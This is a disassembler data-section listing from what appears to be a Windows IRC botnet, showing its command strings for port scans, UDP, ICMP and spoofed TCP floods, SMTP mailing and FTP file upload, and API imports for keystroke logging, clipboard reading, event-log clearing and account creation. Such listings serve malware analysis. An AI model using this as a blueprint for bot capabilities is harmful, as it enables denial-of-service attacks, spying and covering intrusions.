unk_443004 db 2Dh ; - ; DATA XREF: sub_401CC7+61FC�o
db 3, 34h, 2
db 72h ; r
db 65h, 64h, 69h
db 72h ; r
db 65h, 63h, 74h
db 2
db 3, 2Dh, 20h
aFailedToStartR db 'Failed to start redirection thread, error: <%d>.',0
align 4
; char aScan_0[]
aScan_0 db 'scan',0 ; DATA XREF: sub_401CC7+4F44�o
align 10h
; char aSc[]
aSc db 'sc',0 ; DATA XREF: sub_401CC7+4F5B�o
align 4
; char asc_443054[]
asc_443054 db '-' ; DATA XREF: sub_401CC7+6090�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aPortScanStarte db 'Port scan started: %s:%d with delay: %d(ms).',0
align 10h
unk_443090 db 2Dh ; - ; DATA XREF: sub_401CC7+60FF�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aFailedToSta_27 db 'Failed to start scan thread, error: <%d>.',0
align 4
; char aC_privmsg[]
aC_privmsg db 'c_privmsg',0 ; DATA XREF: sub_401CC7+4F72�o
align 4
; char aC_pm[]
aC_pm db 'c_pm',0 ; DATA XREF: sub_401CC7+4F89�o
align 4
; char aSSS_0[]
aSSS_0 db '[%s] <%s> %s',0 ; DATA XREF: sub_401CC7+5FE4�o
align 4
; char aC_action[]
aC_action db 'c_action',0 ; DATA XREF: sub_401CC7+4FA0�o
align 4
; char aC_a[]
aC_a db 'c_a',0 ; DATA XREF: sub_401CC7+4FB7�o
; char dword_4430FC
dword_4430FC dd 54434101h, 204E4F49h, 17325h ; DATA XREF: sub_401CC7+5E73�o
aSSS db '[%s] * %s %s',0 ; DATA XREF: sub_401CC7+5F07�o
align 4
; char aPortscan[]
aPortscan db 'portscan',0 ; DATA XREF: sub_401CC7+4FDD�o
align 4
; char aPsc[]
aPsc db 'psc',0 ; DATA XREF: sub_401CC7+4FF4�o
; char asc_443128[]
asc_443128 db '-' ; DATA XREF: sub_401CC7+5DA0�o
db 3, 34h, 2
db 70h ; p
db 6Fh, 72h, 74h
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aPortScanStar_0 db 'Port scan started: %s with delay: %d(ms) checking range %d-%d.',0
align 4
unk_443178 db 2Dh ; - ; DATA XREF: sub_401CC7+5E0F�o
db 3, 34h, 2
db 70h ; p
db 6Fh, 72h, 74h
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aFailedToSta_28 db 'Failed to start scan thread, error: <%d>.',0
align 4
; char aAdvscan[]
aAdvscan db 'advscan',0 ; DATA XREF: sub_401CC7+500B�o
; char aAsc[]
aAsc db 'asc',0 ; DATA XREF: sub_401CC7+5022�o
; char asc_4431C0[]
asc_4431C0 db '-' ; DATA XREF: sub_401CC7+5875�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aAlreadyDScan_0 db 'Already %d scanning threads. Too many specified.',0
align 10h
unk_443200 db 2Dh ; - ; DATA XREF: sub_401CC7+5AC7�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aFailedToSta_29 db 'Failed to start scan, port is invalid.',0
align 4
unk_443234 db 2Dh ; - ; DATA XREF: sub_401CC7+5B24�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aFailedToSta_30 db 'Failed to start scan, no IP specified.',0
align 4
aRandom_1 db 'Random',0 ; DATA XREF: sub_401CC7+5C68�o
align 10h
aSequential_0 db 'Sequential',0 ; DATA XREF: sub_401CC7+5C6F�o
align 4
; char asc_44327C[]
asc_44327C db '-' ; DATA XREF: sub_401CC7+5C9A�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aSPortScanSta_0 db '%s Port Scan started on %s:%d with a delay of %d seconds for %d m'
db 'inutes using %d threads.',0
align 4
unk_4432E4 db 2Dh ; - ; DATA XREF: sub_401CC7+5D09�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aFailedToSta_31 db 'Failed to start scan thread, error: <%d>.',0
align 4
; char aUdpflood[]
aUdpflood db 'udpflood',0 ; DATA XREF: sub_401CC7+5039�o
align 4
; char aUdp[]
aUdp db 'udp',0 ; DATA XREF: sub_401CC7+5050�o
; char aU[]
aU: ; DATA XREF: sub_401CC7+5067�o
unicode 0, <u>,0
; char asc_443330[]
asc_443330 db '-' ; DATA XREF: sub_401CC7+57AD�o
db 3, 34h, 2
db 75h ; u
db 64h, 70h, 2
db 3
aSendingDPacket db '- Sending %d packets to: %s. Packet size: %d, Delay: %d(ms).',0
align 4
; char asc_443378[]
asc_443378 db '-' ; DATA XREF: sub_401CC7+5818�o
db 3, 34h, 2
db 75h ; u
db 64h, 70h, 2
db 3
aFailedToSta_32 db '- Failed to start flood thread, error: <%d>.',0
align 10h
; char aNetsend[]
aNetsend db 'netsend',0 ; DATA XREF: sub_401CC7+507E�o
; char aNs[]
aNs db 'ns',0 ; DATA XREF: sub_401CC7+5095�o
align 4
; char asc_4433BC[]
asc_4433BC db '-' ; DATA XREF: sub_401CC7+5602�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 73h
db 65h ; e
db 6Eh, 64h, 2
db 3
aSendingMessage db '- Sending message %s times to %s using name %s',0
unk_4433F8 db 2Dh ; - ; DATA XREF: sub_401CC7+56A4�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 73h
db 65h ; e
db 6Eh, 64h, 2
db 3
aNetsendDoesNot db '- NetSend does not work on Win9x systems',0
align 10h
; char asc_443430[]
asc_443430 db '-' ; DATA XREF: sub_401CC7+56C8�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 73h
db 65h ; e
db 6Eh, 64h, 2
db 3
aFailedToSendMe db '- Failed to send message, error <%i>.',0
align 4
unk_443464 db 2Dh ; - ; DATA XREF: sub_401CC7+56FC�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 73h
db 65h ; e
db 6Eh, 64h, 2
db 3
aMessageHasBeen db '- Message has been sent successfuly',0
align 4
; char aPingflood[]
aPingflood db 'pingflood',0 ; DATA XREF: sub_401CC7+50AC�o
align 4
; char aPing_0[]
aPing_0 db 'ping',0 ; DATA XREF: sub_401CC7+50C3�o
align 4
; char aP[]
aP: ; DATA XREF: sub_401CC7+50DA�o
unicode 0, <p>,0
; char asc_4434B0[]
asc_4434B0 db '-' ; DATA XREF: sub_401CC7+5561�o
db 3, 34h, 2
db 70h ; p
db 69h, 6Eh, 67h
db 2
db 3, 2Dh, 20h
aSendingDPingsT db 'Sending %d pings to %s. packet size: %d, timeout: %d(ms).',0
align 4
unk_4434F8 db 2Dh ; - ; DATA XREF: sub_401CC7+55D0�o
db 3, 34h, 2
db 70h ; p
db 69h, 6Eh, 67h
db 2
db 3, 2Dh, 20h
aFailedToSta_33 db 'Failed to start flood thread, error: <%d>.',0
align 10h
; char aIcmp_dllNotAva[]
aIcmp_dllNotAva db 'ICMP.dll not available',0 ; DATA XREF: sub_401CC7+55E5�o
align 4
; char aTcpflood[]
aTcpflood db 'tcpflood',0 ; DATA XREF: sub_401CC7+50F1�o
align 4
; char aTcp[]
aTcp db 'tcp',0 ; DATA XREF: sub_401CC7+5108�o
; char aSyn_0[]
aSyn_0 db 'syn',0 ; DATA XREF: sub_401CC7+533E�o
; char aAck[]
aAck db 'ack',0 ; DATA XREF: sub_401CC7+5356�o
; char aRandom_0[]
aRandom_0 db 'random',0 ; DATA XREF: sub_401CC7+536D�o
align 4
aSpoofed db 'Spoofed',0 ; DATA XREF: sub_401CC7+5418�o
aNormal db 'Normal',0 ; DATA XREF: sub_401CC7+541F�o
align 4
; char asc_443578[]
asc_443578 db '-' ; DATA XREF: sub_401CC7+542F�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aSSFloodingSSFo db '- %s %s flooding: (%s:%s) for %s seconds.',0
align 4
unk_4435AC db 2Dh ; - ; DATA XREF: sub_401CC7+54A9�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aFailedToSta_34 db '- Failed to start flood thread, error: <%d>.',0
align 4
; char asc_4435E4[]
asc_4435E4 db '-' ; DATA XREF: sub_401CC7:loc_40717A�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aInvalidFlood_0 db '- Invalid flood time must be greater than 0.',0
align 4
unk_44361C db 2Dh ; - ; DATA XREF: sub_401CC7+537D�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aInvalidFloodTy db '- Invalid flood type specified.',0
align 4
; char aEmail[]
aEmail db 'email',0 ; DATA XREF: sub_401CC7+511F�o
align 10h
; char asc_443650[]
asc_443650: ; DATA XREF: sub_401CC7+5169�o
unicode 0, < >,0
; char a__1[]
a__1: ; DATA XREF: sub_401CC7+516E�o
unicode 0, <_>,0
; char aHeloRndnickMai[]
aHeloRndnickMai db 'helo $rndnick',0Ah ; DATA XREF: sub_401CC7+520A�o
db 'mail from: <%s>',0Ah
db 'rcpt to: <%s>',0Ah
db 'data',0Ah
db 'subject: %s',0Ah
db 'from: %s',0Ah
db '%s',0Ah
db '.',0Ah,0
; char asc_4436A4[]
asc_4436A4 db '-' ; DATA XREF: sub_401CC7+527E�o
db 3, 34h, 2
db 65h ; e
db 6Dh, 61h, 69h
db 6Ch ; l
db 2, 3, 2Dh
aMessageSentToS db ' Message sent to %s.',0
align 4
; char aHttpcon[]
aHttpcon db 'httpcon',0 ; DATA XREF: sub_401CC7+52CD�o
; char aHcon[]
aHcon db 'hcon',0 ; DATA XREF: sub_401CC7+52E0�o
align 4
; char aUpload[]
aUpload db 'upload',0 ; DATA XREF: sub_401CC7+58AB�o
align 10h
unk_4436E0 db 2Dh ; - ; DATA XREF: sub_401CC7+58CE�o
db 3, 34h, 2
db 66h ; f
db 74h, 70h, 2
db 3
aFileNotFoundS_ db '- File not found: %s.',0
align 10h
; char aSIII_dll[]
aSIII_dll db '%s\%i%i%i.dll',0 ; DATA XREF: sub_401CC7+5918�o
align 10h
; char Mode[]
Mode db 'ab',0 ; DATA XREF: sub_401CC7+5929�o
align 4
; char aOpenSSSSPutSBy[]
aOpenSSSSPutSBy db 'open %s',0Dh,0Ah ; DATA XREF: sub_401CC7+594D�o
db '%s',0Dh,0Ah
db '%s',0Dh,0Ah
db '%s',0Dh,0Ah
db 'put %s',0Dh,0Ah
db 'bye',0Dh,0Ah,0
align 4
; char aSS_2[]
aSS_2 db '-s:%s',0 ; DATA XREF: sub_401CC7+5970�o
align 10h
aFtp_exe db 'ftp.exe',0 ; DATA XREF: sub_401CC7+5987�o
aOpen_0 db 'open',0 ; DATA XREF: sub_401CC7+598C�o
align 10h
unk_443750 db 2Dh ; - ; DATA XREF: sub_401CC7+59A0�o
db 3, 34h, 2
db 66h ; f
db 74h, 70h, 2
db 3
aUploadingFileS db '- Uploading file: %s to: %s',0
align 4
; char asc_443778[]
asc_443778 db '-' ; DATA XREF: sub_401CC7:loc_40766E�o
db 3, 34h, 2
db 66h ; f
db 74h, 70h, 2
db 3
aUploadingFil_0 db '- Uploading file: %s to: %s failed.',0
align 4
; char aNotice_3[]
aNotice_3 db 'NOTICE',0 ; DATA XREF: sub_409D34+F�o
align 10h
aPrivmsg_2 db 'PRIVMSG',0 ; DATA XREF: sub_409D34+16�o
; char aS_21[]
aS_21 db '%s',0 ; DATA XREF: sub_409D34+3D�o
align 4
; char aSSS_1[]
aSSS_1 db '%s %s :%s',0Dh,0Ah,0 ; DATA XREF: sub_409D34+5D�o
aKernel32_dll db 'kernel32.dll',0 ; DATA XREF: sub_409DD4+A�o
align 4
aSeterrormode db 'SetErrorMode',0 ; DATA XREF: sub_409DD4+23�o
align 4
aCreatetoolhelp db 'CreateToolhelp32Snapshot',0 ; DATA XREF: sub_409DD4+2B�o
align 4
aProcess32first db 'Process32First',0 ; DATA XREF: sub_409DD4+38�o
align 4
aProcess32next db 'Process32Next',0 ; DATA XREF: sub_409DD4+45�o
align 4
aModule32first db 'Module32First',0 ; DATA XREF: sub_409DD4+52�o
align 4
aGetdiskfreespa db 'GetDiskFreeSpaceExA',0 ; DATA XREF: sub_409DD4+5F�o
aGetlogicaldriv db 'GetLogicalDriveStringsA',0 ; DATA XREF: sub_409DD4+6C�o
aGetdrivetypea db 'GetDriveTypeA',0 ; DATA XREF: sub_409DD4+79�o
align 10h
aSearchpatha db 'SearchPathA',0 ; DATA XREF: sub_409DD4+86�o
aQueryperforman db 'QueryPerformanceCounter',0 ; DATA XREF: sub_409DD4+93�o
aQueryperform_0 db 'QueryPerformanceFrequency',0 ; DATA XREF: sub_409DD4+A0�o
align 10h
aRegisterservic db 'RegisterServiceProcess',0 ; DATA XREF: sub_409DD4:loc_409EDC�o
align 4
aUser32_dll db 'user32.dll',0 ; DATA XREF: sub_409DD4:loc_409F09�o
align 4
aSendmessagea db 'SendMessageA',0 ; DATA XREF: sub_409DD4+14A�o
align 4
aFindwindowa db 'FindWindowA',0 ; DATA XREF: sub_409DD4+152�o
aIswindow db 'IsWindow',0 ; DATA XREF: sub_409DD4+15F�o
align 4
aDestroywindow db 'DestroyWindow',0 ; DATA XREF: sub_409DD4+16C�o
align 4
aOpenclipboard db 'OpenClipboard',0 ; DATA XREF: sub_409DD4+179�o
align 4
aGetclipboardda db 'GetClipboardData',0 ; DATA XREF: sub_409DD4+186�o
align 10h
aCloseclipboard db 'CloseClipboard',0 ; DATA XREF: sub_409DD4+193�o
align 10h
aExitwindowsex db 'ExitWindowsEx',0 ; DATA XREF: sub_409DD4+1A0�o
align 10h
aGetasynckeysta db 'GetAsyncKeyState',0 ; DATA XREF: sub_409DD4:loc_409FCC�o
align 4
aGetkeystate db 'GetKeyState',0 ; DATA XREF: sub_409DD4+200�o
aGetwindowtexta db 'GetWindowTextA',0 ; DATA XREF: sub_409DD4+20D�o
align 10h
aGetforegroundw db 'GetForegroundWindow',0 ; DATA XREF: sub_409DD4+21A�o
aAdvapi32_dll db 'advapi32.dll',0 ; DATA XREF: sub_409DD4:loc_40A033�o
align 4
aRegopenkeyexa db 'RegOpenKeyExA',0 ; DATA XREF: sub_409DD4+270�o
align 4
aRegcreatekeyex db 'RegCreateKeyExA',0 ; DATA XREF: sub_409DD4+278�o
aRegsetvalueexa db 'RegSetValueExA',0 ; DATA XREF: sub_409DD4+285�o
align 4
aRegqueryvaluee db 'RegQueryValueExA',0 ; DATA XREF: sub_409DD4+292�o
align 4
aRegdeletevalue db 'RegDeleteValueA',0 ; DATA XREF: sub_409DD4+29F�o
aRegclosekey db 'RegCloseKey',0 ; DATA XREF: sub_409DD4+2AC�o
aOpeneventloga db 'OpenEventLogA',0 ; DATA XREF: sub_409DD4+2B9�o
align 4
aCleareventloga db 'ClearEventLogA',0 ; DATA XREF: sub_409DD4+2C6�o
align 4
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_409DD4:loc_40A0E6�o
align 4
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_409DD4+31A�o
align 10h
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_409DD4+327�o
align 4
aOpenscmanagera db 'OpenSCManagerA',0 ; DATA XREF: sub_409DD4:loc_40A12B�o
align 4
aOpenservicea db 'OpenServiceA',0 ; DATA XREF: sub_409DD4+35F�o
align 4
aStartservicea db 'StartServiceA',0 ; DATA XREF: sub_409DD4+36C�o
align 4
aControlservice db 'ControlService',0 ; DATA XREF: sub_409DD4+379�o
align 4
aDeleteservice db 'DeleteService',0 ; DATA XREF: sub_409DD4+386�o
align 4
aCloseserviceha db 'CloseServiceHandle',0 ; DATA XREF: sub_409DD4+393�o
align 4
aEnumservicesst db 'EnumServicesStatusA',0 ; DATA XREF: sub_409DD4+3A0�o
aIsvalidsecurit db 'IsValidSecurityDescriptor',0 ; DATA XREF: sub_409DD4+3AD�o
align 4
aGetusernamea db 'GetUserNameA',0 ; DATA XREF: sub_409DD4:loc_40A1D9�o
align 4
aGdi32_dll db 'gdi32.dll',0 ; DATA XREF: sub_409DD4:loc_40A201�o
align 4
aCreatedca db 'CreateDCA',0 ; DATA XREF: sub_409DD4+43E�o
align 4
aCreatedibsecti db 'CreateDIBSection',0 ; DATA XREF: sub_409DD4+446�o
align 4
aCreatecompatib db 'CreateCompatibleDC',0 ; DATA XREF: sub_409DD4+453�o
align 4
aGetdevicecaps db 'GetDeviceCaps',0 ; DATA XREF: sub_409DD4+460�o
align 4
aGetdibcolortab db 'GetDIBColorTable',0 ; DATA XREF: sub_409DD4+46D�o
align 10h
aSelectobject db 'SelectObject',0 ; DATA XREF: sub_409DD4+47A�o
align 10h
aBitblt db 'BitBlt',0 ; DATA XREF: sub_409DD4+487�o
align 4
aDeletedc db 'DeleteDC',0 ; DATA XREF: sub_409DD4+494�o
align 4
aDeleteobject db 'DeleteObject',0 ; DATA XREF: sub_409DD4+4A1�o
align 4
aWs2_32_dll db 'ws2_32.dll',0 ; DATA XREF: sub_409DD4+514�o
align 10h
aWsastartup db 'WSAStartup',0 ; DATA XREF: sub_409DD4+525�o
align 4
aWsasocketa db 'WSASocketA',0 ; DATA XREF: sub_409DD4+52D�o
align 4
aWsaasyncselect db 'WSAAsyncSelect',0 ; DATA XREF: sub_409DD4+53A�o
align 4
a__wsafdisset db '__WSAFDIsSet',0 ; DATA XREF: sub_409DD4+547�o
align 4
aWsaioctl db 'WSAIoctl',0 ; DATA XREF: sub_409DD4+554�o
align 4
aWsagetlasterro db 'WSAGetLastError',0 ; DATA XREF: sub_409DD4+561�o
aWsacleanup db 'WSACleanup',0 ; DATA XREF: sub_409DD4+56E�o
align 10h
aSocket db 'socket',0 ; DATA XREF: sub_409DD4+57B�o
align 4
aIoctlsocket db 'ioctlsocket',0 ; DATA XREF: sub_409DD4+588�o
aConnect db 'connect',0 ; DATA XREF: sub_409DD4+595�o
aInet_ntoa db 'inet_ntoa',0 ; DATA XREF: sub_409DD4+5A2�o
align 4
aInet_addr db 'inet_addr',0 ; DATA XREF: sub_409DD4+5AF�o
align 4
aHtons db 'htons',0 ; DATA XREF: sub_409DD4+5BC�o
align 4
aHtonl db 'htonl',0 ; DATA XREF: sub_409DD4+5C9�o
align 4
aNtohs db 'ntohs',0 ; DATA XREF: sub_409DD4+5D6�o
align 4
aNtohl db 'ntohl',0 ; DATA XREF: sub_409DD4+5E3�o
align 4
aSend_1 db 'send',0 ; DATA XREF: sub_409DD4+5F0�o
align 4
aSendto db 'sendto',0 ; DATA XREF: sub_409DD4+5FD�o
align 4
aRecv db 'recv',0 ; DATA XREF: sub_409DD4+60A�o
align 4
aRecvfrom db 'recvfrom',0 ; DATA XREF: sub_409DD4+617�o
align 4
aBind db 'bind',0 ; DATA XREF: sub_409DD4+629�o
align 10h
aSelect db 'select',0 ; DATA XREF: sub_409DD4+631�o
align 4
aListen db 'listen',0 ; DATA XREF: sub_409DD4+63E�o
align 10h
aAccept db 'accept',0 ; DATA XREF: sub_409DD4+64B�o
align 4
aSetsockopt db 'setsockopt',0 ; DATA XREF: sub_409DD4+658�o
align 4
aGetsockname db 'getsockname',0 ; DATA XREF: sub_409DD4+665�o
aGethostname db 'gethostname',0 ; DATA XREF: sub_409DD4+672�o
aGethostbyname db 'gethostbyname',0 ; DATA XREF: sub_409DD4+67F�o
align 4
aGethostbyaddr db 'gethostbyaddr',0 ; DATA XREF: sub_409DD4+68C�o
align 4
aGetpeername db 'getpeername',0 ; DATA XREF: sub_409DD4+699�o
aClosesocket db 'closesocket',0 ; DATA XREF: sub_409DD4+6A6�o
aWininet_dll db 'wininet.dll',0 ; DATA XREF: sub_409DD4:loc_40A5B3�o
aInternetgetcon db 'InternetGetConnectedState',0 ; DATA XREF: sub_409DD4+7F0�o
align 4
aInternetgetc_0 db 'InternetGetConnectedStateEx',0 ; DATA XREF: sub_409DD4+7F8�o
aHttpopenreques db 'HttpOpenRequestA',0 ; DATA XREF: sub_409DD4+805�o
align 4
aHttpsendreques db 'HttpSendRequestA',0 ; DATA XREF: sub_409DD4+812�o
align 10h
aInternetconnec db 'InternetConnectA',0 ; DATA XREF: sub_409DD4+81F�o
align 4
aInternetopena db 'InternetOpenA',0 ; DATA XREF: sub_409DD4+82C�o
align 4
aInternetopenur db 'InternetOpenUrlA',0 ; DATA XREF: sub_409DD4+839�o
align 4
aInternetcracku db 'InternetCrackUrlA',0 ; DATA XREF: sub_409DD4+846�o
align 4
aInternetreadfi db 'InternetReadFile',0 ; DATA XREF: sub_409DD4+853�o
align 10h
aInternetcloseh db 'InternetCloseHandle',0 ; DATA XREF: sub_409DD4+860�o
aMozilla4_0Comp db 'Mozilla/4.0 (compatible)',0 ; DATA XREF: sub_409DD4+8D2�o
align 10h
aIcmp_dll db 'icmp.dll',0 ; DATA XREF: sub_409DD4:loc_40A6D3�o
align 4
aIcmpcreatefile db 'IcmpCreateFile',0 ; DATA XREF: sub_409DD4+90C�o
align 4
aIcmpclosehandl db 'IcmpCloseHandle',0 ; DATA XREF: sub_409DD4+914�o
aIcmpsendecho db 'IcmpSendEcho',0 ; DATA XREF: sub_409DD4+921�o
align 4
aNetapi32_dll db 'netapi32.dll',0 ; DATA XREF: sub_409DD4:loc_40A732�o
align 4
aNetshareadd db 'NetShareAdd',0 ; DATA XREF: sub_409DD4+96F�o
aNetsharedel db 'NetShareDel',0 ; DATA XREF: sub_409DD4+977�o
aNetshareenum db 'NetShareEnum',0 ; DATA XREF: sub_409DD4+984�o
align 4
aNetschedulejob db 'NetScheduleJobAdd',0 ; DATA XREF: sub_409DD4+991�o
align 4
aNetapibufferfr db 'NetApiBufferFree',0 ; DATA XREF: sub_409DD4+99E�o
align 4
aNetremotetod db 'NetRemoteTOD',0 ; DATA XREF: sub_409DD4+9AB�o
align 4
aNetuseradd db 'NetUserAdd',0 ; DATA XREF: sub_409DD4+9B8�o
align 4
aNetuserdel db 'NetUserDel',0 ; DATA XREF: sub_409DD4+9C5�o
align 4
aNetuserenum db 'NetUserEnum',0 ; DATA XREF: sub_409DD4+9D2�o
aNetusergetinfo db 'NetUserGetInfo',0 ; DATA XREF: sub_409DD4+9DF�o
align 10h
aNetmessagebuff db 'NetMessageBufferSend',0 ; DATA XREF: sub_409DD4+9EC�o
align 4
aNetwkstagetinf db 'NetWkstaGetInfo',0 ; DATA XREF: sub_409DD4+9F9�o
aDnsapi_dll db 'dnsapi.dll',0 ; DATA XREF: sub_409DD4:loc_40A84E�o
align 4
aDnsflushresolv db 'DnsFlushResolverCache',0 ; DATA XREF: sub_409DD4+A87�o
align 4
aDnsflushreso_0 db 'DnsFlushResolverCacheEntry_A',0 ; DATA XREF: sub_409DD4+A8F�o
align 4
aIphlpapi_dll db 'iphlpapi.dll',0 ; DATA XREF: sub_409DD4:loc_40A898�o
align 4
aGetipnettable db 'GetIpNetTable',0 ; DATA XREF: sub_409DD4+AD1�o
align 4
aDeleteipnetent db 'DeleteIpNetEntry',0 ; DATA XREF: sub_409DD4+AD9�o
align 10h
aMpr_dll db 'mpr.dll',0 ; DATA XREF: sub_409DD4:loc_40A8E2�o
aWnetaddconnect db 'WNetAddConnection2A',0 ; DATA XREF: sub_409DD4+B1B�o
aWnetaddconne_0 db 'WNetAddConnection2W',0 ; DATA XREF: sub_409DD4+B23�o
aWnetcancelconn db 'WNetCancelConnection2A',0 ; DATA XREF: sub_409DD4+B30�o
align 4
aWnetcancelco_0 db 'WNetCancelConnection2W',0 ; DATA XREF: sub_409DD4+B3D�o
align 10h
aShell32_dll db 'shell32.dll',0 ; DATA XREF: sub_409DD4:loc_40A956�o
aShellexecutea db 'ShellExecuteA',0 ; DATA XREF: sub_409DD4+B8F�o
align 4
aShchangenotify db 'SHChangeNotify',0 ; DATA XREF: sub_409DD4+B97�o
align 4
aOdbc32_dll db 'odbc32.dll',0 ; DATA XREF: sub_409DD4:loc_40A9A0�o
align 4
aSqldriverconne db 'SQLDriverConnect',0 ; DATA XREF: sub_409DD4+BD9�o
align 4
aSqlsetenvattr db 'SQLSetEnvAttr',0 ; DATA XREF: sub_409DD4+BE1�o
align 4
aSqlexecdirect db 'SQLExecDirect',0 ; DATA XREF: sub_409DD4+BEE�o
align 4
aSqlallochandle db 'SQLAllocHandle',0 ; DATA XREF: sub_409DD4+BFB�o
align 4
aSqlfreehandle db 'SQLFreeHandle',0 ; DATA XREF: sub_409DD4+C08�o
align 4
aSqldisconnect db 'SQLDisconnect',0 ; DATA XREF: sub_409DD4+C15�o
align 4
aAvicap32_dll db 'avicap32.dll',0 ; DATA XREF: sub_409DD4:loc_40AA3E�o
align 4
aCapcreatecaptu db 'capCreateCaptureWindowA',0 ; DATA XREF: sub_409DD4+C77�o
aCapgetdriverde db 'capGetDriverDescriptionA',0 ; DATA XREF: sub_409DD4+C7F�o
align 10h
; char aKernel32_dllFa[]
aKernel32_dllFa db 'Kernel32.dll failed. <%d>',0 ; DATA XREF: sub_40AA90+28�o
align 4
; char aUser32_dllFail[]
aUser32_dllFail db 'User32.dll failed. <%d>',0 ; DATA XREF: sub_40AA90+5C�o
; char aAdvapi32_dllFa[]
aAdvapi32_dllFa db 'Advapi32.dll failed. <%d>',0 ; DATA XREF: sub_40AA90+90�o
align 10h
; char aGdi32_dllFaile[]
aGdi32_dllFaile db 'Gdi32.dll failed. <%d>',0 ; DATA XREF: sub_40AA90+C4�o
align 4
; char aWs2_32_dllFail[]
aWs2_32_dllFail db 'Ws2_32.dll failed. <%d>',0 ; DATA XREF: sub_40AA90+F8�o
; char aWininet_dllFai[]
aWininet_dllFai db 'Wininet.dll failed. <%d>',0 ; DATA XREF: sub_40AA90+12C�o
align 4
; char aIcmp_dllFailed[]
aIcmp_dllFailed db 'Icmp.dll failed. <%d>',0 ; DATA XREF: sub_40AA90+160�o
align 4
; char aNetapi32_dllFa[]
aNetapi32_dllFa db 'Netapi32.dll failed. <%d>',0 ; DATA XREF: sub_40AA90+194�o
align 10h
; char aDnsapi_dllFail[]
aDnsapi_dllFail db 'Dnsapi.dll failed. <%d>',0 ; DATA XREF: sub_40AA90+1C8�o
; char aIphlpapi_dllFa[]
aIphlpapi_dllFa db 'Iphlpapi.dll failed. <%d>',0 ; DATA XREF: sub_40AA90+1FC�o
align 4
; char aMpr32_dllFaile[]
aMpr32_dllFaile db 'Mpr32.dll failed. <%d>',0 ; DATA XREF: sub_40AA90+230�o
align 4
; char aShell32_dllFai[]
aShell32_dllFai db 'Shell32.dll failed. <%d>',0 ; DATA XREF: sub_40AA90+264�o
align 4
; char aOdbc32_dllFail[]
aOdbc32_dllFail db 'Odbc32.dll failed. <%d>',0 ; DATA XREF: sub_40AA90+298�o
; char aAvicap32_dllFa[]
aAvicap32_dllFa db 'Avicap32.dll failed. <%d>',0 ; DATA XREF: sub_40AA90+2CC�o
align 4
; char asc_44422C[]
asc_44422C db '-' ; DATA XREF: sub_40AA90+2F2�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aDllTestComplet db 'DLL test complete.',0
align 4
a__9: ; DATA XREF: .text:0040ADF0�o
unicode 0, <.>,0
a__10: ; DATA XREF: .text:0040AE08�o
unicode 0, <.>,0
unk_444254 db 2Dh ; - ; DATA XREF: sub_40AE8D+8C�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aErrorGettingAr db 'error getting ARP cache: %d',0
; char asc_444280[]
asc_444280 db '-' ; DATA XREF: sub_40AE8D:loc_40AF20�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aUnableToAlloca db 'unable to allocate ARP cache',0
align 10h
unk_4442B0 db 2Dh ; - ; DATA XREF: sub_40AE8D:loc_40AEE6�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aArpCacheIsEmpt db 'ARP cache is empty',0
align 4
unk_4442D4 db 2Dh ; - ; DATA XREF: sub_40AE8D:loc_40AF52�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aNotSupportedBy db 'not supported by this system',0
align 4
; char asc_444304[]
asc_444304 db '-' ; DATA XREF: sub_40AE8D+43�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aErrorGetting_0 db 'error getting ARP cache: %d',0
; char aD_D_D_D[]
aD_D_D_D db '%d.%d.%d.%d',0 ; DATA XREF: sub_40AF71+46�o
align 10h
aReal db 'real',0
align 4
dd 0
dword_44434C dd 0 ; DATA XREF: sub_40B44F+7�o
off_444350 dd offset sub_40B06A ; DATA XREF: sub_40B44F+49�r
aConst db 'const',0
align 10h
dd 1
dd offset sub_40B0D7
aLetter db 'letter',0
align 10h
dd 0
dd 2
dd offset sub_40B135
aComp db 'comp',0
align 8
dd 3
dd offset sub_40B182
aCountry db 'country',0
dd 0
dd 4
dd offset sub_40B228
dd 736Fh, 2 dup(0)
dd 5
dd offset sub_40B29D
off_4443B8 dd offset aAbdulrazak ; DATA XREF: sub_40B06A+21�r
; "Abdulrazak"
dd offset aAckerman ; "Ackerman"
dd offset aAdams ; "Adams"
off_4443C4 dd offset aAddison ; DATA XREF: sub_40B44F+39�o
; "Addison"
dd offset aAdelstein ; "Adelstein"
